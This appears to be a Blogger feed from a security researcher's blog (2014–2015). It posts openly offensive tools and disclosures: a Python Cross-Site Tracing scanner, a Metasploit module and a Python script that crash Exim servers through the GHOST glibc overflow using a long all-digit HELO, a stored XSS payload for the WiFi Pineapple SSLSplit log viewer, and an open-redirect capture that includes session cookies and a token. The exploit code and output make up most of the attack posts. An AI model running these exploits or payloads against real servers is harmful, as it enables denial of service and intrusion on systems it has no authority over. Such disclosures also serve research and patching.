tag:blogger.com,1999:blog-33525376400114303932024-02-07T19:23:16.140-08:00Treadstone Securityhttp://treadstonesecurity.blogspot.comUnknownnoreply@blogger.comBlogger33125tag:blogger.com,1999:blog-3352537640011430393.post-64709589265301032142015-11-12T04:22:00.001-08:002015-11-12T04:22:55.215-08:00InjectX to Find XSS<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/NdGGCNjQB2A" width="480"></iframe>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-3759095348709229572015-06-06T16:59:00.000-07:002015-07-08T16:47:20.911-07:00Automatically Brute Force All Services On A Remote Host<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKLiOk-TIUXcGL7TDvKtK2P2CkQOxS0nUB_0hh-k5DSRNnD9n0mvtYYUwMjUtEhWXqFAZzmY7Sp_O9u-lUyxKPJABCRDVmXmgm4ZAg7BERuQBrO-o2ywbszFuYKcyJyUP46wnM1H4ZinwF/s1600/BruteX-by-1N3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKLiOk-TIUXcGL7TDvKtK2P2CkQOxS0nUB_0hh-k5DSRNnD9n0mvtYYUwMjUtEhWXqFAZzmY7Sp_O9u-lUyxKPJABCRDVmXmgm4ZAg7BERuQBrO-o2ywbszFuYKcyJyUP46wnM1H4ZinwF/s640/BruteX-by-1N3.png" width="484" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://github.com/1N3/BruteX" style="background-color: white;" target="_blank">https://github.com/1N3/BruteX</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-78109503285021566262015-02-28T03:05:00.001-08:002015-02-28T03:05:33.985-08:00Cross-Site Tracer Exploit<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4f0zC1JyTPJ2Z8hw0stkV-l3ShAH8HkpvhfgcGndgRzzlO7eQmiv8nocupCfRnOZSp_iT84utbND4be9m_mqjVa2pko20JOjOnt5Pr2haFg81n-zxACbb_6Q5U7HLF6AfbKq2WtSe2quB/s1600/xsstracer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4f0zC1JyTPJ2Z8hw0stkV-l3ShAH8HkpvhfgcGndgRzzlO7eQmiv8nocupCfRnOZSp_iT84utbND4be9m_mqjVa2pko20JOjOnt5Pr2haFg81n-zxACbb_6Q5U7HLF6AfbKq2WtSe2quB/s1600/xsstracer.png" height="222" width="400" /></a></div>
<br />
#!/usr/bin/python<br /># Cross-Site Tracer by 1N3 v20150224<br /># https://crowdshield.com<br />#<br /># ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, you can create a list of domains or IP addresses to iterate through by doing 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'<br />#<br /># USAGE: xsstracer.py <IP/host> <port><br />#<br /><br />import socket<br />import time<br />import sys, getopt<br /><br />class bcolors:<br /> HEADER = '\033[95m'<br /> OKBLUE = '\033[94m'<br /> OKGREEN = '\033[92m'<br /> WARNING = '\033[93m'<br /> FAIL = '\033[91m'<br /> ENDC = '\033[0m'<br /> BOLD = '\033[1m'<br /> UNDERLINE = '\033[4m'<br /><br />def main(argv):<br /> argc = len(argv)<br /><br /> if argc <= 2:<br /> print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC<br /> print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC<br /> print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC<br /> sys.exit(0)<br /><br /> target = argv[1] # SET TARGET<br /> port = argv[2] # SET PORT<br /><br /> buffer1 = "TRACE / HTTP/1.1"<br /> buffer2 = "Test: <script>alert(1);</script>"<br /> buffer3 = "Host: " + target<br /><br /> print ""<br /> print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 "<br /> print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com"<br /> print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port <br /><br /> s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> result=s.connect_ex((target,int(port)))<br /><br /> if result == 0:<br /> s.send(buffer1 + "\n")<br /> s.send(buffer2 + "\n")<br /> s.send(buffer3 + "\n\n")<br /> data = s.recv(1024)<br /> script = "alert"<br /> if script.lower() in data.lower():<br /> print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" 
+ bcolors.ENDC<br /> print ""<br /> print bcolors.WARNING + data + bcolors.ENDC<br /> else:<br /> print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!"<br /> print ""<br /> print ""<br /><br /> else:<br /> print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC<br /><br /> s.close()<br /><br />main(sys.argv)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-43875655847053925252015-01-29T14:58:00.000-08:002015-01-29T14:58:56.825-08:00Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLpKKikKGODS9Vz-vWYVdj_8viN1lTpQJTIEK2okwGRk78Yic8rbf5Vt-fNwDYnFD4HsVceJOHwXJWUsRA054XhDm7ieRdIb0JEIQReFnvnFW2-BOMvQgyvXSPl-EO82Dws8XRDUpt2OXK/s1600/metasploit-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLpKKikKGODS9Vz-vWYVdj_8viN1lTpQJTIEK2okwGRk78Yic8rbf5Vt-fNwDYnFD4HsVceJOHwXJWUsRA054XhDm7ieRdIb0JEIQReFnvnFW2-BOMvQgyvXSPl-EO82Dws8XRDUpt2OXK/s1600/metasploit-logo.png" height="262" width="400" /></a></div>
<br />
<br />
msf auxiliary(ghost-exim-smtp-dos) > run<br /><br />[*] 192.168.1.132:25 - Server: ESMTP Exim 4.20<br />[*] 192.168.1.132:25 - HELO: ESMTP Exim 4.20<br />[-] Auxiliary failed: EOFError EOFError<br />[-] Call stack:<br />[-] /usr/share/metasploit-framework/lib/rex/io/stream.rb:203:in `get_once'<br />[-] /usr/share/metasploit-framework/lib/msf/core/exploit/smtp.rb:68:in `raw_send_recv'<br />[-] /usr/share/metasploit-framework/modules/exploits/linux/smtp/ghost-exim-smtp-dos.rb:44:in `run'<br />[*] Auxiliary module execution completed<br />msf auxiliary(ghost-exim-smtp-dos) > <br />
<br />
<br />##<br /># This file is part of the Metasploit Framework and may be subject to <br /># redistribution and commercial restrictions. Please see the Metasploit<br /># Framework web site for more information on licensing and terms of use.<br /># http://metasploit.com/framework/<br />##<br /><br /><br />require 'msf/core'<br /><br /><br />class Metasploit3 < Msf::Auxiliary<br /><br /> include Msf::Exploit::Remote::Smtp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize<br /> super(<br /> 'Name' => 'Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235',<br /> 'Description' => %q{<br /> This module exploits a buffer overflow in Exim SMTP servers version 4.20 or less resulting in a service crash on vulnerable systems.<br /> },<br /> 'Author' => [ '1N3' ],<br /> 'License' => MSF_LICENSE,<br /> 'Version' => '$Revision: 1 $'<br /> )<br /> end<br /><br /> def run()<br /> connect<br /> print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")<br /><br /> if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /<br /> disconnect<br /> fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")<br /> end<br /><br /> buffer = "0" * 1023<br /> helo_resp = raw_send_recv("HELO " + buffer + "\r\n")<br /> helo_resp.each_line do |line|<br /> print_status("#{rhost}:#{rport} - HELO: #{line.strip}")<br /> end<br /><br /> ehlo_resp = raw_send_recv("EHLO " + buffer + "\r\n")<br /> ehlo_resp.each_line do |line|<br /> print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")<br /> end<br /><br /> print_status("Exploit sent!")<br /> disconnect()<br /> end<br />endUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-28221798991158304372015-01-28T08:09:00.002-08:002015-01-31T05:58:03.167-08:00Exim ESMTP GHOST DoS Exploit<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdn.grahamcluley.com/wp-content/uploads/2015/01/ghost-170.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://cdn.grahamcluley.com/wp-content/uploads/2015/01/ghost-170.jpeg" /></a></div>
<br />
#!/usr/bin/python<br />
# Exim ESMTP DoS Exploit by 1N3 v20150128<br />
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow. The bug is in glibc, not in Exim itself: any Exim that<br /># hands the HELO name to gethostbyname() on an unpatched glibc is affected (the transcript below is Exim 4.80). The HELO<br /># argument is deliberately all digits -- the overflowing numeric-address code path is only reached for names made of<br /># digits and dots. This is a crash (DoS) trigger, not a code-execution exploit; use only against hosts you are authorised to test.<br />
# http://crowdshield.com<br />
#<br />
# USAGE: python ghost-smtp-dos.py <ip> <port><br />
#<br />
# Escape character is '^]'.<br />
# 220 debian-7-7-64b ESMTP Exim 4.80 ...<br />
# HELO <br />
# 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br />
# Connection closed by foreign host.<br />
#<br />
# user () debian-7-7-64b:~$ dmesg<br />
# ...<br />
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in <br />
# libc-2.13.so[7fabef2a2000+182000]<br />
<br />
import socket<br />
import time<br />
import sys, getopt<br />
<br />
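def main(argv):
    """Send an oversized, all-digit HELO and EHLO to an SMTP server and report the replies.

    argv: a sys.argv-style list -- argv[1] is the target host or IP, argv[2] the TCP port.
    Both are required. The original usage text only mentioned <host> while the code
    went on to index argv[2], so omitting the port crashed with IndexError instead of
    printing usage; that is fixed here.

    Prints the server banner and each reply. A vulnerable server dies while processing
    the HELO, which shows up on this side as a connection that is closed or reset
    instead of a reply (compare the "Connection closed by foreign host" / segfault
    transcript in the header), so that case is reported explicitly rather than
    surfacing as an uncaught socket exception.

    Exit status: 0 after printing usage, 2 on a non-numeric port, 1 when the target
    cannot be reached or the conversation times out. The socket is always closed.
    """
    if len(argv) <= 2:
        print("usage: %s <host> <port>" % (argv[0],))
        sys.exit(0)

    target = argv[1]  # SET TARGET
    port = argv[2]  # SET PORT
    try:
        port_num = int(port)
    except ValueError:
        print("(--==== Invalid port: " + port)
        sys.exit(2)

    # Payload kept byte-for-byte from the original script: a long run of digits so that
    # glibc's numeric-hostname parsing path inside gethostbyname() is the one that runs.
    buffer = b"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

    print("(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com")
    print("(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" + str(len(buffer)))

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)  # a wedged or half-dead listener must not hang the run forever
    try:
        sock.connect((target, port_num))
        print("CONNECTION: " + _recv_text(sock))
        for verb in (b"HELO ", b"EHLO "):
            sock.sendall(verb + buffer + b"\r\n")
            reply = _recv_text(sock)
            if not reply:
                # Orderly close with no reply: the listener went away mid-session,
                # which is the observable symptom of the crash on the client side.
                print("(--==== Connection closed by " + target + " after "
                      + verb.decode("ascii").strip() + " -- server likely crashed")
                break
            print("received: " + reply)
    except socket.timeout:
        print("(--==== Timed out waiting for " + target + ":" + port)
        sys.exit(1)
    except socket.error as err:
        # A reset right after the HELO is the other way a crashed Exim shows up.
        print("(--==== Socket error talking to " + target + ":" + port + ": " + str(err))
        sys.exit(1)
    finally:
        sock.close()


def _recv_text(sock):
    """Read one chunk (up to 1024 bytes) from sock and return it decoded as text.

    Undecodable bytes are replaced rather than raised on, since the reply is only
    printed. Returns an empty string when the peer has closed the connection.
    """
    return sock.recv(1024).decode("ascii", "replace")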
<br />
main(sys.argv)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-36408368448515817172015-01-19T11:19:00.001-08:002015-01-19T11:21:12.039-08:00Hak5 Wifi Pineapple RCE PoC By 1N3<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/I_i2RhfB-Z8" width="480"></iframe>
<br />
<a href="https://crowdshield.com/">https://crowdshield.com</a> - PineappleV by Hak5 has a post-authentication code execution flaw in the "Log View" infusion: input reaching the log viewer is neither validated nor sanitized, so an authenticated user of the web UI can make the device run unintended code. Because only authenticated users can reach the device it is arguably a proof of concept rather than a standalone vulnerability, but "authenticated only" does not put it out of an outsider's reach: anything that can drive the owner's browser (for example the stored XSS in the SSLSplit infusion described further down this page, which is planted by a client of the rogue AP) could plausibly be pointed at it.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-79622620136391659282015-01-19T11:09:00.001-08:002015-01-19T11:16:38.874-08:00Hak5 PineAP + Burpsuite + Tcpdump + Dnsspoof Tutorial by 1N3<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/zNLW3CbJ3XE" width="480"></iframe>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-20019325685122598792015-01-15T07:40:00.001-08:002015-01-19T11:15:00.486-08:00Pwn Any Windows PC In 5 Seconds With BadUSB | CrowdShield #bugbounty<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/XgrLZ6lwIeY" width="480"></iframe>
<a href="https://crowdshield.com/blog/2015/pwn-any-windows-pc-in-5-seconds-with-badusb.php#.VLffa-y3DLM.blogger">Pwn Any Windows PC In 5 Seconds With BadUSB | CrowdShield #bugbounty</a><br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-78766200704446466562015-01-15T02:22:00.001-08:002015-01-19T11:13:01.199-08:00Why Every Company Needs A Bug Bounty Program | CrowdShield #bugbounty<a href="https://crowdshield.com/blog/2015/why-every-company-needs-a-bug-bounty-program.php#.VLeU8DjJgZI.blogger">Why Every Company Needs A Bug Bounty Program | CrowdShield #bugbounty</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-63975125459504099262014-12-30T16:56:00.003-08:002014-12-31T05:33:18.025-08:00WiFi Pineapple MK5 / SSLSplit v1.1 Cross-Site Scripting (Stored)Vendor: Hak5<br />
Website: http://www.hak5.com<br />
Hardware: Wifi Pineapple MK5<br />
Software: SSLSplit<br />
Version: 1.1<br />
Author: 1N3<br />
<br />
I'm releasing this info purely for educational purposes. There appears to be a stored Cross-Site Scripting vulnerability in the SSLSplit v1.1 infusion for the Pineapple MK5: data captured from intercepted connections is written to the SSLSplit logs and later rendered in the Pineapple web UI without being escaped. A client of the rogue AP (the party being intercepted) can therefore plant HTML/script that executes in the browser of the Pineapple's owner when the owner views or downloads the SSLSplit logs -- the intercepted party attacking the interceptor, inside the authenticated admin UI.<br />
<br />
Reproduction Steps:<br />
1. Attacker sets up a RogueAP using PineappleV with SSLSplit running<br />
2. A Wifi user connects to the PineappleV RogueAP<br />
3. The Wifi user hosts an image on their own web server whose meta tags contain the following string: "></script>">'><img src=x onerror=confirm(4)><br />
4. The Wifi user opens a browser over the rogue AP and requests that image, so SSLSplit intercepts and logs the request, payload included<br />
5. The attacker (the Pineapple owner) then downloads the log via the SSLSplit web UI (SSLSplit > History > Click "Download" for the affected log file)<br />
<br />
Result:<br />
The confirm(4) dialog from the injected payload fires in the Pineapple owner's browser, showing that logged request data is rendered unescaped by the web UI<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilv2IAMwR69pPb7joVxNset5dPVCXfbFI-Z5DIyaJibz2NfymGL5gvwkeyMIbqDyYTTHaYaXfl_sRjtlatH_1x7xs5SdfF-gpUWIYjDrPcqhHcFPDlPZm4QSXJc-Th1wkKc2SRdengYZub/s1600/sslsplit_xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilv2IAMwR69pPb7joVxNset5dPVCXfbFI-Z5DIyaJibz2NfymGL5gvwkeyMIbqDyYTTHaYaXfl_sRjtlatH_1x7xs5SdfF-gpUWIYjDrPcqhHcFPDlPZm4QSXJc-Th1wkKc2SRdengYZub/s1600/sslsplit_xss1.png" height="150" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9-7zk20mQuEIPz2zK7JViJfzBpkAz3-xzYsUTjL7rxMa5z8JAk0-ku8cgrts19eNaDjwaZoJQZj5zecJGjckg-k5lnFrUDggoHRWuY0mDGGeJz13QlfD01ZLEN4TOPVk7UZqe3pl66Su/s1600/sslsplit_xss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9-7zk20mQuEIPz2zK7JViJfzBpkAz3-xzYsUTjL7rxMa5z8JAk0-ku8cgrts19eNaDjwaZoJQZj5zecJGjckg-k5lnFrUDggoHRWuY0mDGGeJz13QlfD01ZLEN4TOPVk7UZqe3pl66Su/s1600/sslsplit_xss2.png" height="158" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi42HYjj54fiwwnfhlr9wt_h6eIzY_LbSlaY5Q4NLyTrnuU0TnYE4Y0ohZm2WuAGAiOAALOSqimbYXjdJqBrKkvCwFJ8FMJwOqzQom9jUaK21vJGrYvfMiQtvwXmPFhrSbM3l5PM_CF_sKp/s1600/sslsplit_xss3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi42HYjj54fiwwnfhlr9wt_h6eIzY_LbSlaY5Q4NLyTrnuU0TnYE4Y0ohZm2WuAGAiOAALOSqimbYXjdJqBrKkvCwFJ8FMJwOqzQom9jUaK21vJGrYvfMiQtvwXmPFhrSbM3l5PM_CF_sKp/s1600/sslsplit_xss3.png" height="217" width="400" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-78668928108087519242014-12-05T12:42:00.001-08:002014-12-05T12:42:26.188-08:00MS14-068 Privilege Escalation PoC: Become Domain Administrator with Any User Account<a href="https://twitter.com/bidord" target="_blank">https://twitter.com/bidord</a><br />
<br />
<a href="http://www.reddit.com/r/netsec/comments/2ocf9s/pykek_ms14068_privilege_escalation_poc_become/" target="_blank">http://www.reddit.com/r/netsec/comments/2ocf9s/pykek_ms14068_privilege_escalation_poc_become/</a><br />
<br />
<a href="https://github.com/bidord/pykek" target="_blank">https://github.com/bidord/pykek</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-10394776674276755072014-12-03T17:26:00.000-08:002014-12-31T05:34:21.439-08:00CrowdShield Bug Bounty Disclosure Programs | #bugbounty<h2>
<span style="font-size: x-large;"><span style="font-family: "Trebuchet MS",sans-serif;">Leverage the crowd! </span></span></h2>
<h3>
<span style="font-size: x-large;"><span style="font-family: "Trebuchet MS",sans-serif;">Improve your cyber security! </span></span></h3>
<span style="font-family: "Trebuchet MS",sans-serif;">Our <b>CrowdShield </b>framework connects you to security experts globally to keep you one step ahead of malicious hackers. <b>CrowdShield </b>allows you to test your technology around the clock to measure and prioritize real world threats to your cyber security. </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Our
community of researchers, also known as the crowd, is comprised of
ethical hackers from around the world who responsibly disclose security
bugs in our bounty programs. </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Cost effective and faster than standard security programs, <b>CrowdShield </b>provides
the framework to easily manage your bounty program and rewards the
crowd for their contributions. It's a win for everyone. </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Open an account to start creating your customized bounty program. Using the <b>CrowdShield </b>platform,
you will be able to choose the scope and reward for your bounty.
Researchers send submissions to your bounty program. You review and
validate submissions to determine if the researcher should be rewarded.
Use information from the crowd to patch bugs and make your technology
safer than ever before, protecting sensitive data and your reputation.</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Start your bug bounty program in seconds and start receiving feedback from ethical hackers around the world! </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"><a href="http://crowdshield.com/signup.php" target="_blank">http://crowdshield.com/signup.php </a></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkRhFq0Jf_uQDkyBhYR_unsDclZZ45x8k4KgZngINXfzhlWFhEd68xCfYBEcnrHcGgFAAaccENSZ84RrCtL1zKGdsuceZVvo88IyojgTB1h0mA8vU1BLEZi4Onx0ykRlCWXa4SSjsMRV61/s1600/crowdshield_bug_bounty_program_list.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkRhFq0Jf_uQDkyBhYR_unsDclZZ45x8k4KgZngINXfzhlWFhEd68xCfYBEcnrHcGgFAAaccENSZ84RrCtL1zKGdsuceZVvo88IyojgTB1h0mA8vU1BLEZi4Onx0ykRlCWXa4SSjsMRV61/s1600/crowdshield_bug_bounty_program_list.jpg" height="640" width="404" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-35994043287243691982014-11-28T03:37:00.000-08:002014-11-28T03:38:09.160-08:00Google Captcha Open Redirect<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkweTkVzqnS_DII3YVKwp8FAAHxuGwA-uf5kmsPKhvspSK4nzh9H07u90cpG7upna83ZNlX1uluPWODGelGe2_wdscOcn48lHlnEIyUyZTAEOpHwdBLJgAxAxO_ySxLx3nemCZxOzeJaTd/s1600/open_redirect2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkweTkVzqnS_DII3YVKwp8FAAHxuGwA-uf5kmsPKhvspSK4nzh9H07u90cpG7upna83ZNlX1uluPWODGelGe2_wdscOcn48lHlnEIyUyZTAEOpHwdBLJgAxAxO_ySxLx3nemCZxOzeJaTd/s1600/open_redirect2.png" height="327" width="400" /></a><br />
<br />
Google's captcha page suffers from an open redirect vulnerability because it fails to verify that the "continue" parameter in the URI is actually a Google domain or even the referring domain. After checking Google's bug bounty however, they state:<br />
<br />
"<b>URL redirection.</b> We recognize that the address bar is the only reliable
security indicator in modern browsers; consequently, we hold that the usability and
security benefits of a small number of well-designed and closely monitored redirectors
outweigh their true risks".<br />
<br />
So, I'm publicly disclosing this as a POC for research/educational purposes. Two things to keep straight when reading the capture below: the alert(1) in the final response is served by www.xerosecurity.com (the redirect target -- see its Host header), not by google.com, so this is an open redirect and not XSS on Google; and the redirected request carries the GOOGLE_ABUSE_EXEMPTION value -- ID, timestamp and the client IP -- in its google_abuse query parameter, so whatever that token is worth is handed to the third-party site.<br />
<br />
Affected URL:<br />
<a href="https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search">https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search </a><br />
<br />
GET /sorry/CaptchaRedirect?continue=<span style="color: red;">http%3A%2F%2Fwww.xerosecurity.com%2Fsearch</span>&id=14323360019737732799&captcha=phaures&submit=Submit HTTP/1.1
<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<br />
Accept-Language: en-US,en;q=0.5
<br />
Referer: https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search
<br />
Cookie: NID=67=IJICmq9eG5l0yY71_TfQozLw8DqSRnymUmwzff1ftXnOJUKR1DmQ6oNiVUHutjOq8gSK-U5pHi96fgeEcjj7PX_tzBD5A_mOXE5wgZFddOC1p7gpn6gh7OfKbY8yASBSdChbMBpd2599HQqixF_yQZJJ3YGLPE0ojZGWkkX-ArdVUC_-pN9koTIoKx9eE0YY8SXE6GjnCnhvQYfEQuDW-Uxe; SID=[REDACTED: live Google session cookies scrubbed -- never publish these in a capture]; HSID=[REDACTED]; SSID=[REDACTED]; APISID=[REDACTED]; SAPISID=[REDACTED]; PREF=ID=062dffbad71fd850:U=741c8f032b07f996:FF=0:LD=en:TM=1415471152:LM=1415472410:GM=1:S=SJROGFDVcQgxz3Bj; GOOGLE_ABUSE_EXEMPTION=ID=b1036b53551499da:TM=1417137339:C=c:IP=37.221.161.234-:S=APGng0sgdi6BVBm7QOwlNSTnlE3Uvcupow
<br />
Connection: keep-alive
<br />
Host: ipv4.google.com
<br />
<br />
GET /search?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db1036b53551499da:TM%3D1417137339:C%3Dc:IP%3D37.221.161.234-:S%3DAPGng0v_nA-tCWgqXfxnch6lFhMcnFuAeg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DFri,+28-Nov-2014+04:15:39+GMT HTTP/1.1
<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<br />
Accept-Language: en-US,en;q=0.5
<br />
Cookie: __unam=7639673-1499c44efc6-201377d0-26; _ga=GA1.2.1993885406.1416758620; PHPSESSID=kph66vkf5on6879ivj7paml4o4
<br />
Connection: keep-alive
<br />
<span style="color: red;">Host: www.xerosecurity.com
</span><br />
Proxy-Connection: Keep-Alive
<br />
<br />
HTTP/1.1 200 OK
<br />
Date: Fri, 28 Nov 2014 01:08:32 GMT
<br />
Server: Apache/2.2.22 (Debian)
<br />
Last-Modified: Fri, 28 Nov 2014 00:39:03 GMT
<br />
ETag: "e40dbf-47-508e07cd2d95b"
<br />
Accept-Ranges: bytes
<br />
Content-Length: 71
<br />
Keep-Alive: timeout=5, max=100
<br />
Connection: Keep-Alive
<br />
<br />
<html><br />
<head></head><br />
<body><br />
<span style="color: red;"><script>alert(1);</script></span><br />
</body><br />
</html><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhUPNUW80yjmBWFpOC9XXEzX9KzwDyOVkPR6Y6byuSaD6pqcc6DKV8mLSbKsBfhmM69iw8VMBCYdF2uIhrps8JRVH-LvMs1YMECljCPoAx1GGoRAFwkT0dcq6MkFroDIeZ5uvsibtujByh/s1600/Screenshot+from+2014-11-27+20:14:00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhUPNUW80yjmBWFpOC9XXEzX9KzwDyOVkPR6Y6byuSaD6pqcc6DKV8mLSbKsBfhmM69iw8VMBCYdF2uIhrps8JRVH-LvMs1YMECljCPoAx1GGoRAFwkT0dcq6MkFroDIeZ5uvsibtujByh/s1600/Screenshot+from+2014-11-27+20:14:00.png" height="215" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
